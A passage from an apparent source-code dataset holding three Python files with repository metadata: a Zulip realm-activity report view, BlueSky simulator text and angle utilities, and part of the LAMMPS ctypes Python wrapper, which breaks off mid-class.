a585d12ff7c4658962a0a5778ef2f6298cf1fc3c634edc57c818da3976bca4f2
|
import itertools
from datetime import datetime
from typing import Any, Dict, List, Optional, Set, Tuple
from django.db import connection
from django.db.models.query import QuerySet
from django.http import HttpRequest, HttpResponse, HttpResponseNotFound
from django.shortcuts import render
from django.utils.timezone import now as timezone_now
from psycopg2.sql import SQL
from analytics.views.activity_common import (
format_date_for_activity_reports,
get_user_activity_summary,
make_table,
user_activity_link,
)
from zerver.decorator import require_server_admin
from zerver.models import Realm, UserActivity
def get_user_activity_records_for_realm(realm: str, is_bot: bool) -> QuerySet:
fields = [
"user_profile__full_name",
"user_profile__delivery_email",
"query",
"client__name",
"count",
"last_visit",
]
records = UserActivity.objects.filter(
user_profile__realm__string_id=realm,
user_profile__is_active=True,
user_profile__is_bot=is_bot,
)
records = records.order_by("user_profile__delivery_email", "-last_visit")
records = records.select_related("user_profile", "client").only(*fields)
return records
def realm_user_summary_table(
all_records: List[QuerySet], admin_emails: Set[str]
) -> Tuple[Dict[str, Any], str]:
user_records = {}
def by_email(record: QuerySet) -> str:
return record.user_profile.delivery_email
for email, records in itertools.groupby(all_records, by_email):
user_records[email] = get_user_activity_summary(list(records))
def get_last_visit(user_summary: Dict[str, Dict[str, datetime]], k: str) -> Optional[datetime]:
if k in user_summary:
return user_summary[k]["last_visit"]
else:
return None
def get_count(user_summary: Dict[str, Dict[str, str]], k: str) -> str:
if k in user_summary:
return user_summary[k]["count"]
else:
return ""
def is_recent(val: datetime) -> bool:
age = timezone_now() - val
return age.total_seconds() < 5 * 60
rows = []
for email, user_summary in user_records.items():
email_link = user_activity_link(email, user_summary["user_profile_id"])
sent_count = get_count(user_summary, "send")
cells = [user_summary["name"], email_link, sent_count]
row_class = ""
for field in ["use", "send", "pointer", "desktop", "ZulipiOS", "Android"]:
visit = get_last_visit(user_summary, field)
if field == "use":
if visit and is_recent(visit):
row_class += " recently_active"
if email in admin_emails:
row_class += " admin"
val = format_date_for_activity_reports(visit)
cells.append(val)
row = dict(cells=cells, row_class=row_class)
rows.append(row)
def by_used_time(row: Dict[str, Any]) -> str:
return row["cells"][3]
rows = sorted(rows, key=by_used_time, reverse=True)
cols = [
"Name",
"Email",
"Total sent",
"Heard from",
"Message sent",
"Pointer motion",
"Desktop",
"ZulipiOS",
"Android",
]
title = "Summary"
content = make_table(title, cols, rows, has_row_class=True)
return user_records, content
def realm_client_table(user_summaries: Dict[str, Dict[str, Any]]) -> str:
exclude_keys = [
"internal",
"name",
"user_profile_id",
"use",
"send",
"pointer",
"website",
"desktop",
]
rows = []
for email, user_summary in user_summaries.items():
email_link = user_activity_link(email, user_summary["user_profile_id"])
name = user_summary["name"]
for k, v in user_summary.items():
if k in exclude_keys:
continue
client = k
count = v["count"]
last_visit = v["last_visit"]
row = [
format_date_for_activity_reports(last_visit),
client,
name,
email_link,
count,
]
rows.append(row)
rows = sorted(rows, key=lambda r: r[0], reverse=True)
cols = [
"Last visit",
"Client",
"Name",
"Email",
"Count",
]
title = "Clients"
return make_table(title, cols, rows)
def sent_messages_report(realm: str) -> str:
title = "Recently sent messages for " + realm
cols = [
"Date",
"Humans",
"Bots",
]
query = SQL(
"""
select
series.day::date,
humans.cnt,
bots.cnt
from (
select generate_series(
(now()::date - interval '2 week'),
now()::date,
interval '1 day'
) as day
) as series
left join (
select
date_sent::date date_sent,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
where
r.string_id = %s
and
(not up.is_bot)
and
date_sent > now() - interval '2 week'
group by
date_sent::date
order by
date_sent::date
) humans on
series.day = humans.date_sent
left join (
select
date_sent::date date_sent,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
where
r.string_id = %s
and
up.is_bot
and
date_sent > now() - interval '2 week'
group by
date_sent::date
order by
date_sent::date
) bots on
series.day = bots.date_sent
"""
)
cursor = connection.cursor()
cursor.execute(query, [realm, realm])
rows = cursor.fetchall()
cursor.close()
return make_table(title, cols, rows)
@require_server_admin
def get_realm_activity(request: HttpRequest, realm_str: str) -> HttpResponse:
data: List[Tuple[str, str]] = []
all_user_records: Dict[str, Any] = {}
try:
admins = Realm.objects.get(string_id=realm_str).get_human_admin_users()
except Realm.DoesNotExist:
return HttpResponseNotFound()
admin_emails = {admin.delivery_email for admin in admins}
for is_bot, page_title in [(False, "Humans"), (True, "Bots")]:
all_records = list(get_user_activity_records_for_realm(realm_str, is_bot))
user_records, content = realm_user_summary_table(all_records, admin_emails)
all_user_records.update(user_records)
data += [(page_title, content)]
page_title = "Clients"
content = realm_client_table(all_user_records)
data += [(page_title, content)]
page_title = "History"
content = sent_messages_report(realm_str)
data += [(page_title, content)]
title = realm_str
return render(
request,
"analytics/activity.html",
context=dict(data=data, realm_link=None, title=title),
)
|
eeshangarg/zulip
|
analytics/views/realm_activity.py
|
Python
|
apache-2.0
| 7,466
|
[
"VisIt"
] |
321f1a37e9a0d65e34a6619e1c0c7a421216dcd740cfda04fa027e9175bf6d1a
|
"""
Miscellaneous modules
Modules:
txt2alt(txt): read altitude[ft] from txt (FL or ft)
txt2spd(spd,h): read CAS or Mach and convert to TAS for given altitude
tim2txt(t) : convert time[s] to HH:MM:SS.hh
i2txt(i,n) : convert integer to string of n chars with leading zeros
Created by : Jacco M. Hoekstra
"""
from numpy import *
from time import strftime, gmtime
from .aero import cas2tas, mach2tas, kts
def txt2alt(txt):
"""Convert text to altitude in ft: also FL300 => 30000. as float"""
# First check for FL otherwise feet
try:
if txt.upper()[:2] == 'FL' and len(txt) >= 4: # Syntax check Flxxx or Flxx
return 100. * int(txt[2:])
else:
return float(txt)
except ValueError:
return -1e9
def tim2txt(t):
"""Convert time to timestring: HH:MM:SS.hh"""
return strftime("%H:%M:%S.", gmtime(t)) + i2txt(int((t - int(t)) * 100.), 2)
def txt2tim(txt):
"""Convert text to time in seconds:
HH
HH:MM
HH:MM:SS
HH:MM:SS.hh
"""
timlst = txt.split(":")
t = 0.
# HH
if len(timlst[0])>0 and timlst[0].isdigit():
t = t+3600.*int(timlst[0])
# MM
if len(timlst)>1 and len(timlst[1])>0 and timlst[1].isdigit():
t = t+60.*int(timlst[1])
# SS.hh
if len(timlst)>2 and len(timlst[2])>0:
if timlst[2].replace(".","0").isdigit():
t = t + float(timlst[2])
return t
def i2txt(i, n):
"""Convert integer to string with leading zeros to make it n chars long"""
return '{:0{}d}'.format(i, n)
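# Added illustration (not in the original module): a tiny smoke test of the
# text helpers above; all input values are made up for demonstration.
def _demo_text_helpers():
    assert txt2alt("FL300") == 30000.  # flight level -> feet
    assert txt2alt("2500") == 2500.    # plain feet
    assert i2txt(7, 3) == "007"        # zero-padded integer
    assert abs(txt2tim("01:30:15.5") - 5415.5) < 1e-6  # HH:MM:SS.hh -> seconds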
def txt2spd(txt, h):
"""Convert text to speed (EAS [kts]/MACH[-] to TAS[m/s])"""
if len(txt) == 0:
return -1.
try:
if txt[0] == 'M':
M_ = float(txt[1:])
if M_ >= 20: # Handle M95 notation as .95
M_ = M_ * 0.01
acspd = mach2tas(M_, h) # m/s
elif txt[0] == '.' or (len(txt) >= 2 and txt[:2] == '0.'):
spd_ = float(txt)
acspd = mach2tas(spd_, h) # m/s
else:
spd_ = float(txt) * kts
acspd = cas2tas(spd_, h) # m/s
except:
return -1.
return acspd
def col2rgb(txt):
cols = {"black": (0, 0, 0), "white": (255, 255, 255), "green": (0, 255, 0),
"red": (255, 0, 0), "blue": (0, 0, 255), "magenta": (255, 0, 255),
"yellow": (240, 255, 127), "amber": (255, 255, 0), "cyan": (0, 255, 255)}
try:
rgb = cols[txt.lower().strip()]
except:
rgb = cols["white"] # default
return rgb
def degto180(angle):
"""Change to domain -180,180 """
return (angle + 180.) % 360 - 180.
def degtopi(angle):
"""Change to domain -pi,pi """
return (angle + pi) % (2.*pi) - pi
def findnearest(lat, lon, latarr, lonarr):
"""Find index of nearest postion in numpy arrays with lat and lon"""
if len(latarr) > 0 and len(latarr) == len(lonarr):
coslat = cos(radians(lat))
dy = radians(lat - latarr)
dx = coslat * radians(degto180(lon - lonarr))
d2 = dx * dx + dy * dy
idx = list(d2).index(d2.min())
return idx
else:
return -1
def cmdsplit(cmdline, trafids=None):
cmdline = cmdline.strip()
if len(cmdline) == 0:
return '', []
# Use both comma and space as a separator: two commas mean an empty argument
while cmdline.find(",,") >= 0:
cmdline = cmdline.replace(",,", ",@,") # Mark empty arguments
# Replace comma's by space
cmdline = cmdline.replace(",", " ")
# Split using spaces
cmdargs = cmdline.split() # Make list of cmd arguments
# Adjust for empty arguments
for i in range(len(cmdargs)):
if cmdargs[i] == "@":
cmdargs[i] = ""
# If a traffic id list is passed, check if command and first argument need to be switched
if trafids and len(cmdargs) > 1 and trafids.count(cmdargs[0]):
cmdargs[0:2] = cmdargs[1::-1]
# return command, argumentlist
return cmdargs[0], cmdargs[1:]
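# Added illustration (not in the original module): cmdsplit() turns ",," into
# an empty argument and swaps a leading traffic id with the command; the
# callsign and command below are made up.
def _demo_cmdsplit():
    assert cmdsplit("ALT KL204,,FL100") == ("ALT", ["KL204", "", "FL100"])
    assert cmdsplit("KL204 ALT FL100", trafids=["KL204"]) == ("ALT", ["KL204", "FL100"])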
def txt2lat(lattxt):
"""txt2lat: input txt: N52'14'13.5 or N52"""
txt = lattxt.upper().replace("N", "").replace("S", "-") # North positive, South negative
neg = txt.count("-") > 0
if txt.count("'") > 0 or txt.count('"') > 0:
txt = txt.replace('"', "'") # replace " by '
degs = txt.split("'")
div = 1
lat = 0
if neg:
f = -1.
else:
f = 1.
for xtxt in degs:
if len(xtxt) > 0:
try:
lat = lat + f * abs(float(xtxt)) / float(div)
div = div * 60
except:
print("txt2lat value error:",lattxt)
return 0.0
else:
lat = float(txt)
return lat
# Return float
def txt2lon(lontxt):
"""txt2lat: input txt: N52'14'13.5 or N52"""
# It should first be checked if lontxt is a regular float, to avoid removing
# the 'e' in a scientific-notation number.
try:
lon = float(lontxt)
        # A leading E will trigger the error and simply means East, just as W = West = negative
except:
txt = lontxt.upper().replace("E", "").replace("W", "-") # East positive, West negative
neg = txt.count("-") > 0
# Use of "'" and '"' as degrees/minutes/seconds
# Also "N52'"
if txt.count("'") > 0 or txt.count('"') > 0:
txt = txt.replace('"', "'") # replace " by '
degs = txt.split("'")
div = 1
lon = 0.0
if neg:
f = -1.
else:
f = 1.
for xtxt in degs:
                if len(xtxt) > 0:
try:
lon = lon + f * abs(float(xtxt)) / float(div)
except:
print("txt2lon value error:",lontxt)
return 0.0
div = div * 60
else: # Cope with "W65"without "'" or '"', also "-65" or "--65"
try:
neg = txt.count("-") > 0
if neg:
f = -1.
else:
f = 1.
lon = f*abs(float(txt))
except:
print("txt2lon value error:",lontxt)
return 0.0
return lon
def lat2txt(lat):
d,m,s = float2degminsec(abs(lat))
return "NS"[lat<0] + "%02d'%02d'"%(int(d),int(m))+str(s)+'"'
def lon2txt(lon):
d,m,s = float2degminsec(abs(lon))
return "EW"[lon<0] + "%03d'%02d'"%(int(d),int(m))+str(s)+'"'
def latlon2txt(lat,lon):
return lat2txt(lat)+" "+lon2txt(lon)
def deg180(dangle):
""" Convert any difference in angles to interval [ -180,180 ) """
return (dangle + 180.) % 360. - 180.
def float2degminsec(x):
deg = int(x)
minutes = int(x*60.) - deg *60.
sec = int(x*3600.) - deg*3600. - minutes*60.
return deg,minutes,sec
def findall(lst,x):
# Find indices of multiple occurences of x in lst
idx = []
i = 0
found = True
while i<len(lst) and found:
try:
i = lst[i:].index(x)+i
idx.append(i)
i = i + 1
found = True
except:
found = False
return idx
|
ethertricity/bluesky
|
bluesky/tools/misc.py
|
Python
|
gpl-3.0
| 7,322
|
[
"Amber"
] |
2641973c247af2126477595d8358f5e696f244b8ea258da75db20c75954808d5
|
# ----------------------------------------------------------------------
# LAMMPS - Large-scale Atomic/Molecular Massively Parallel Simulator
# http://lammps.sandia.gov, Sandia National Laboratories
# Steve Plimpton, sjplimp@sandia.gov
#
# Copyright (2003) Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government retains
# certain rights in this software. This software is distributed under
# the GNU General Public License.
#
# See the README file in the top-level LAMMPS directory.
# -------------------------------------------------------------------------
# Python wrappers on LAMMPS library via ctypes
# for python3 compatibility
from __future__ import print_function
# imports for simple LAMMPS python wrapper module "lammps"
import sys,traceback,types
from ctypes import *
from os.path import dirname,abspath,join
from inspect import getsourcefile
# imports for advanced LAMMPS python wrapper modules "PyLammps" and "IPyLammps"
from collections import namedtuple
import os
import select
import re
import sys
def get_ctypes_int(size):
if size == 4:
return c_int32
elif size == 8:
return c_int64
return c_int
class MPIAbortException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return repr(self.message)
class lammps(object):
# detect if Python is using version of mpi4py that can pass a communicator
has_mpi4py_v2 = False
try:
from mpi4py import MPI
from mpi4py import __version__ as mpi4py_version
if mpi4py_version.split('.')[0] == '2':
has_mpi4py_v2 = True
except:
pass
# create instance of LAMMPS
def __init__(self,name="",cmdargs=None,ptr=None,comm=None):
self.comm = comm
self.opened = 0
# determine module location
modpath = dirname(abspath(getsourcefile(lambda:0)))
self.lib = None
# if a pointer to a LAMMPS object is handed in,
# all symbols should already be available
try:
if ptr: self.lib = CDLL("",RTLD_GLOBAL)
except:
self.lib = None
# load liblammps.so unless name is given
# if name = "g++", load liblammps_g++.so
# try loading the LAMMPS shared object from the location
# of lammps.py with an absolute path,
# so that LD_LIBRARY_PATH does not need to be set for regular install
# fall back to loading with a relative path,
# typically requires LD_LIBRARY_PATH to be set appropriately
if not self.lib:
try:
if not name: self.lib = CDLL(join(modpath,"liblammps.so"),RTLD_GLOBAL)
else: self.lib = CDLL(join(modpath,"liblammps_%s.so" % name),
RTLD_GLOBAL)
except:
if not name: self.lib = CDLL("liblammps.so",RTLD_GLOBAL)
else: self.lib = CDLL("liblammps_%s.so" % name,RTLD_GLOBAL)
# if no ptr provided, create an instance of LAMMPS
# don't know how to pass an MPI communicator from PyPar
# but we can pass an MPI communicator from mpi4py v2.0.0 and later
# no_mpi call lets LAMMPS use MPI_COMM_WORLD
# cargs = array of C strings from args
    # if ptr, then we are embedding Python in a LAMMPS input script
# ptr is the desired instance of LAMMPS
# just convert it to ctypes ptr and store in self.lmp
if not ptr:
# with mpi4py v2, can pass MPI communicator to LAMMPS
# need to adjust for type of MPI communicator object
# allow for int (like MPICH) or void* (like OpenMPI)
if lammps.has_mpi4py_v2 and comm != None:
if lammps.MPI._sizeof(lammps.MPI.Comm) == sizeof(c_int):
MPI_Comm = c_int
else:
MPI_Comm = c_void_p
narg = 0
cargs = 0
if cmdargs:
cmdargs.insert(0,"lammps.py")
narg = len(cmdargs)
for i in range(narg):
if type(cmdargs[i]) is str:
cmdargs[i] = cmdargs[i].encode()
cargs = (c_char_p*narg)(*cmdargs)
self.lib.lammps_open.argtypes = [c_int, c_char_p*narg, \
MPI_Comm, c_void_p()]
else:
self.lib.lammps_open.argtypes = [c_int, c_int, \
MPI_Comm, c_void_p()]
self.lib.lammps_open.restype = None
self.opened = 1
self.lmp = c_void_p()
comm_ptr = lammps.MPI._addressof(comm)
comm_val = MPI_Comm.from_address(comm_ptr)
self.lib.lammps_open(narg,cargs,comm_val,byref(self.lmp))
else:
self.opened = 1
if cmdargs:
cmdargs.insert(0,"lammps.py")
narg = len(cmdargs)
for i in range(narg):
if type(cmdargs[i]) is str:
cmdargs[i] = cmdargs[i].encode()
cargs = (c_char_p*narg)(*cmdargs)
self.lmp = c_void_p()
self.lib.lammps_open_no_mpi(narg,cargs,byref(self.lmp))
else:
self.lmp = c_void_p()
self.lib.lammps_open_no_mpi(0,None,byref(self.lmp))
# could use just this if LAMMPS lib interface supported it
# self.lmp = self.lib.lammps_open_no_mpi(0,None)
else:
# magic to convert ptr to ctypes ptr
if sys.version_info >= (3, 0):
# Python 3 (uses PyCapsule API)
pythonapi.PyCapsule_GetPointer.restype = c_void_p
pythonapi.PyCapsule_GetPointer.argtypes = [py_object, c_char_p]
self.lmp = c_void_p(pythonapi.PyCapsule_GetPointer(ptr, None))
else:
# Python 2 (uses PyCObject API)
pythonapi.PyCObject_AsVoidPtr.restype = c_void_p
pythonapi.PyCObject_AsVoidPtr.argtypes = [py_object]
self.lmp = c_void_p(pythonapi.PyCObject_AsVoidPtr(ptr))
# optional numpy support (lazy loading)
self._numpy = None
# set default types
self.c_bigint = get_ctypes_int(self.extract_setting("bigint"))
self.c_tagint = get_ctypes_int(self.extract_setting("tagint"))
self.c_imageint = get_ctypes_int(self.extract_setting("imageint"))
def __del__(self):
if self.lmp and self.opened:
self.lib.lammps_close(self.lmp)
self.opened = 0
def close(self):
if self.opened: self.lib.lammps_close(self.lmp)
self.lmp = None
self.opened = 0
def version(self):
return self.lib.lammps_version(self.lmp)
def file(self,file):
if file: file = file.encode()
self.lib.lammps_file(self.lmp,file)
# send a single command
def command(self,cmd):
if cmd: cmd = cmd.encode()
self.lib.lammps_command(self.lmp,cmd)
if self.uses_exceptions and self.lib.lammps_has_error(self.lmp):
sb = create_string_buffer(100)
error_type = self.lib.lammps_get_last_error_message(self.lmp, sb, 100)
error_msg = sb.value.decode().strip()
if error_type == 2:
raise MPIAbortException(error_msg)
raise Exception(error_msg)
# send a list of commands
def commands_list(self,cmdlist):
cmds = [x.encode() for x in cmdlist if type(x) is str]
args = (c_char_p * len(cmdlist))(*cmds)
self.lib.lammps_commands_list(self.lmp,len(cmdlist),args)
# send a string of commands
def commands_string(self,multicmd):
if type(multicmd) is str:
multicmd = multicmd.encode()
self.lib.lammps_commands_string(self.lmp,c_char_p(multicmd))
# extract global info
def extract_global(self,name,type):
if name: name = name.encode()
if type == 0:
self.lib.lammps_extract_global.restype = POINTER(c_int)
elif type == 1:
self.lib.lammps_extract_global.restype = POINTER(c_double)
else: return None
ptr = self.lib.lammps_extract_global(self.lmp,name)
return ptr[0]
# extract per-atom info
def extract_atom(self,name,type):
if name: name = name.encode()
if type == 0:
self.lib.lammps_extract_atom.restype = POINTER(c_int)
elif type == 1:
self.lib.lammps_extract_atom.restype = POINTER(POINTER(c_int))
elif type == 2:
self.lib.lammps_extract_atom.restype = POINTER(c_double)
elif type == 3:
self.lib.lammps_extract_atom.restype = POINTER(POINTER(c_double))
else: return None
ptr = self.lib.lammps_extract_atom(self.lmp,name)
return ptr
# extract lammps type byte sizes
def extract_setting(self, name):
if name: name = name.encode()
    self.lib.lammps_extract_setting.restype = c_int
return int(self.lib.lammps_extract_setting(self.lmp,name))
@property
def numpy(self):
if not self._numpy:
import numpy as np
class LammpsNumpyWrapper:
def __init__(self, lmp):
self.lmp = lmp
def extract_atom_iarray(self, name, nelem, dim=1):
if dim == 1:
tmp = self.lmp.extract_atom(name, 0)
ptr = cast(tmp, POINTER(c_int * nelem))
else:
tmp = self.lmp.extract_atom(name, 1)
ptr = cast(tmp[0], POINTER(c_int * nelem * dim))
a = np.frombuffer(ptr.contents, dtype=np.intc)
a.shape = (nelem, dim)
return a
def extract_atom_darray(self, name, nelem, dim=1):
if dim == 1:
tmp = self.lmp.extract_atom(name, 2)
ptr = cast(tmp, POINTER(c_double * nelem))
else:
tmp = self.lmp.extract_atom(name, 3)
ptr = cast(tmp[0], POINTER(c_double * nelem * dim))
a = np.frombuffer(ptr.contents)
a.shape = (nelem, dim)
return a
self._numpy = LammpsNumpyWrapper(self)
return self._numpy
# extract compute info
def extract_compute(self,id,style,type):
if id: id = id.encode()
if type == 0:
if style > 0: return None
self.lib.lammps_extract_compute.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr[0]
if type == 1:
self.lib.lammps_extract_compute.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr
if type == 2:
self.lib.lammps_extract_compute.restype = POINTER(POINTER(c_double))
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr
return None
# extract fix info
# in case of global datum, free memory for 1 double via lammps_free()
# double was allocated by library interface function
def extract_fix(self,id,style,type,i=0,j=0):
if id: id = id.encode()
if style == 0:
self.lib.lammps_extract_fix.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_fix(self.lmp,id,style,type,i,j)
result = ptr[0]
self.lib.lammps_free(ptr)
return result
elif (style == 1) or (style == 2):
if type == 1:
self.lib.lammps_extract_fix.restype = POINTER(c_double)
elif type == 2:
self.lib.lammps_extract_fix.restype = POINTER(POINTER(c_double))
else:
return None
ptr = self.lib.lammps_extract_fix(self.lmp,id,style,type,i,j)
return ptr
else:
return None
# extract variable info
# free memory for 1 double or 1 vector of doubles via lammps_free()
# for vector, must copy nlocal returned values to local c_double vector
# memory was allocated by library interface function
def extract_variable(self,name,group,type):
if name: name = name.encode()
if group: group = group.encode()
if type == 0:
self.lib.lammps_extract_variable.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_variable(self.lmp,name,group)
result = ptr[0]
self.lib.lammps_free(ptr)
return result
if type == 1:
self.lib.lammps_extract_global.restype = POINTER(c_int)
nlocalptr = self.lib.lammps_extract_global(self.lmp,"nlocal".encode())
nlocal = nlocalptr[0]
result = (c_double*nlocal)()
self.lib.lammps_extract_variable.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_variable(self.lmp,name,group)
for i in range(nlocal): result[i] = ptr[i]
self.lib.lammps_free(ptr)
return result
return None
# set variable value
# value is converted to string
# returns 0 for success, -1 if failed
def set_variable(self,name,value):
if name: name = name.encode()
if value: value = str(value).encode()
return self.lib.lammps_set_variable(self.lmp,name,value)
# return current value of thermo keyword
def get_thermo(self,name):
if name: name = name.encode()
self.lib.lammps_get_thermo.restype = c_double
return self.lib.lammps_get_thermo(self.lmp,name)
# return total number of atoms in system
def get_natoms(self):
return self.lib.lammps_get_natoms(self.lmp)
# return vector of atom properties gathered across procs, ordered by atom ID
# name = atom property recognized by LAMMPS in atom->extract()
# type = 0 for integer values, 1 for double values
  # count = number of per-atom values, 1 for type or charge, 3 for x or f
  # returned data is a 1d vector - doc how it is ordered?
  # NOTE: how could we ensure we are converting to the correct Python type
  # e.g. for Python list or NumPy, etc
  # ditto for extract_atom() above
def gather_atoms(self,name,type,count):
if name: name = name.encode()
natoms = self.lib.lammps_get_natoms(self.lmp)
if type == 0:
data = ((count*natoms)*c_int)()
self.lib.lammps_gather_atoms(self.lmp,name,type,count,data)
elif type == 1:
data = ((count*natoms)*c_double)()
self.lib.lammps_gather_atoms(self.lmp,name,type,count,data)
else: return None
return data
# scatter vector of atom properties across procs, ordered by atom ID
# name = atom property recognized by LAMMPS in atom->extract()
# type = 0 for integer values, 1 for double values
  # count = number of per-atom values, 1 for type or charge, 3 for x or f
  # assume data is of correct type and length, as created by gather_atoms()
  # NOTE: how could we ensure we are passing the correct type to LAMMPS
# e.g. for Python list or NumPy, etc
def scatter_atoms(self,name,type,count,data):
if name: name = name.encode()
self.lib.lammps_scatter_atoms(self.lmp,name,type,count,data)
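  # Added illustration (not in the original wrapper): round-trip per-atom
  # coordinates through gather_atoms()/scatter_atoms(); assumes a live system
  # with atoms defined, and the 0.1 shift is arbitrary.
  def _example_gather_scatter(self):
    x = self.gather_atoms("x", 1, 3)   # doubles, 3 values per atom, ordered by ID
    x[0] += 0.1                        # shift x-coordinate of atom ID 1
    self.scatter_atoms("x", 1, 3, x)   # push the modified coords back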
# create N atoms on all procs
# N = global number of atoms
# id = ID of each atom (optional, can be None)
# type = type of each atom (1 to Ntypes) (required)
# x = coords of each atom as (N,3) array (required)
# v = velocity of each atom as (N,3) array (optional, can be None)
  # NOTE: how could we ensure we are passing the correct type to LAMMPS
# e.g. for Python list or NumPy, etc
# ditto for gather_atoms() above
def create_atoms(self,n,id,type,x,v,image=None,shrinkexceed=False):
if id:
id_lmp = (c_int * n)()
id_lmp[:] = id
else:
id_lmp = id
if image:
image_lmp = (c_int * n)()
image_lmp[:] = image
else:
image_lmp = image
type_lmp = (c_int * n)()
type_lmp[:] = type
self.lib.lammps_create_atoms(self.lmp,n,id_lmp,type_lmp,x,v,image_lmp,shrinkexceed)
@property
def uses_exceptions(self):
""" Return whether the LAMMPS shared library was compiled with C++ exceptions handling enabled """
try:
if self.lib.lammps_has_error:
return True
except(AttributeError):
return False
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
################################################################################
# Alternative Python Wrapper
# Written by Richard Berger <richard.berger@temple.edu>
################################################################################
class OutputCapture(object):
""" Utility class to capture LAMMPS library output """
def __init__(self):
self.stdout_pipe_read, self.stdout_pipe_write = os.pipe()
self.stdout_fd = 1
def __enter__(self):
self.stdout = os.dup(self.stdout_fd)
os.dup2(self.stdout_pipe_write, self.stdout_fd)
return self
  def __exit__(self, type, value, traceback):
os.dup2(self.stdout, self.stdout_fd)
os.close(self.stdout)
os.close(self.stdout_pipe_read)
os.close(self.stdout_pipe_write)
# check if we have more to read from the pipe
def more_data(self, pipe):
r, _, _ = select.select([pipe], [], [], 0)
return bool(r)
# read the whole pipe
def read_pipe(self, pipe):
out = ""
while self.more_data(pipe):
out += os.read(pipe, 1024).decode()
return out
@property
def output(self):
return self.read_pipe(self.stdout_pipe_read)
class Variable(object):
def __init__(self, lammps_wrapper_instance, name, style, definition):
self.wrapper = lammps_wrapper_instance
self.name = name
self.style = style
self.definition = definition.split()
@property
def value(self):
if self.style == 'atom':
return list(self.wrapper.lmp.extract_variable(self.name, "all", 1))
else:
value = self.wrapper.lmp_print('"${%s}"' % self.name).strip()
try:
return float(value)
except ValueError:
return value
class AtomList(object):
def __init__(self, lammps_wrapper_instance):
self.lmp = lammps_wrapper_instance
self.natoms = self.lmp.system.natoms
self.dimensions = self.lmp.system.dimensions
def __getitem__(self, index):
if self.dimensions == 2:
return Atom2D(self.lmp, index + 1)
return Atom(self.lmp, index + 1)
class Atom(object):
def __init__(self, lammps_wrapper_instance, index):
self.lmp = lammps_wrapper_instance
self.index = index
@property
def id(self):
return int(self.lmp.eval("id[%d]" % self.index))
@property
def type(self):
return int(self.lmp.eval("type[%d]" % self.index))
@property
def mol(self):
return self.lmp.eval("mol[%d]" % self.index)
@property
def mass(self):
return self.lmp.eval("mass[%d]" % self.index)
@property
def position(self):
return (self.lmp.eval("x[%d]" % self.index),
self.lmp.eval("y[%d]" % self.index),
self.lmp.eval("z[%d]" % self.index))
@position.setter
def position(self, value):
self.lmp.set("atom", self.index, "x", value[0])
self.lmp.set("atom", self.index, "y", value[1])
self.lmp.set("atom", self.index, "z", value[2])
@property
def velocity(self):
return (self.lmp.eval("vx[%d]" % self.index),
self.lmp.eval("vy[%d]" % self.index),
self.lmp.eval("vz[%d]" % self.index))
@property
def force(self):
return (self.lmp.eval("fx[%d]" % self.index),
self.lmp.eval("fy[%d]" % self.index),
self.lmp.eval("fz[%d]" % self.index))
@property
def charge(self):
return self.lmp.eval("q[%d]" % self.index)
class Atom2D(Atom):
def __init__(self, lammps_wrapper_instance, index):
super(Atom2D, self).__init__(lammps_wrapper_instance, index)
@property
def position(self):
return (self.lmp.eval("x[%d]" % self.index),
self.lmp.eval("y[%d]" % self.index))
@position.setter
def position(self, value):
self.lmp.set("atom", self.index, "x", value[0])
self.lmp.set("atom", self.index, "y", value[1])
@property
def velocity(self):
return (self.lmp.eval("vx[%d]" % self.index),
self.lmp.eval("vy[%d]" % self.index))
@property
def force(self):
return (self.lmp.eval("fx[%d]" % self.index),
self.lmp.eval("fy[%d]" % self.index))
def get_thermo_data(output):
""" traverse output of runs and extract thermo data columns """
if isinstance(output, str):
lines = output.splitlines()
else:
lines = output
runs = []
columns = []
in_run = False
current_run = {}
for line in lines:
if line.startswith("Per MPI rank memory allocation"):
in_run = True
elif in_run and len(columns) == 0:
# first line after memory usage are column names
columns = line.split()
current_run = {}
for col in columns:
current_run[col] = []
elif line.startswith("Loop time of "):
in_run = False
      columns = []  # reset so a later run re-parses its own header line
thermo_data = namedtuple('ThermoData', list(current_run.keys()))(*list(current_run.values()))
r = {'thermo' : thermo_data }
runs.append(namedtuple('Run', list(r.keys()))(*list(r.values())))
elif in_run and len(columns) > 0:
values = [float(x) for x in line.split()]
for i, col in enumerate(columns):
current_run[col].append(values[i])
return runs
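# Added illustration (not in the original wrapper): get_thermo_data() parses
# captured screen output; the two-column log below is a minimal made-up run.
def _example_get_thermo_data():
  log = ("Per MPI rank memory allocation (min/avg/max) ...\n"
         "Step Temp\n"
         "0 1.0\n"
         "100 0.97\n"
         "Loop time of 0.1 on 1 procs\n")
  runs = get_thermo_data(log)
  return runs[0].thermo.Temp  # -> [1.0, 0.97]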
class PyLammps(object):
"""
More Python-like wrapper for LAMMPS (e.g., for iPython)
See examples/ipython for usage
"""
def __init__(self,name="",cmdargs=None,ptr=None,comm=None):
if ptr:
if isinstance(ptr,PyLammps):
self.lmp = ptr.lmp
elif isinstance(ptr,lammps):
self.lmp = ptr
else:
self.lmp = lammps(name=name,cmdargs=cmdargs,ptr=ptr,comm=comm)
else:
self.lmp = lammps(name=name,cmdargs=cmdargs,ptr=None,comm=comm)
print("LAMMPS output is captured by PyLammps wrapper")
self._cmd_history = []
self.runs = []
def __del__(self):
if self.lmp: self.lmp.close()
self.lmp = None
def close(self):
if self.lmp: self.lmp.close()
self.lmp = None
def version(self):
return self.lmp.version()
def file(self,file):
self.lmp.file(file)
def write_script(self,filename):
""" Write LAMMPS script file containing all commands executed up until now """
with open(filename, "w") as f:
for cmd in self._cmd_history:
f.write("%s\n" % cmd)
def command(self,cmd):
self.lmp.command(cmd)
self._cmd_history.append(cmd)
def run(self, *args, **kwargs):
output = self.__getattr__('run')(*args, **kwargs)
self.runs += get_thermo_data(output)
return output
@property
def last_run(self):
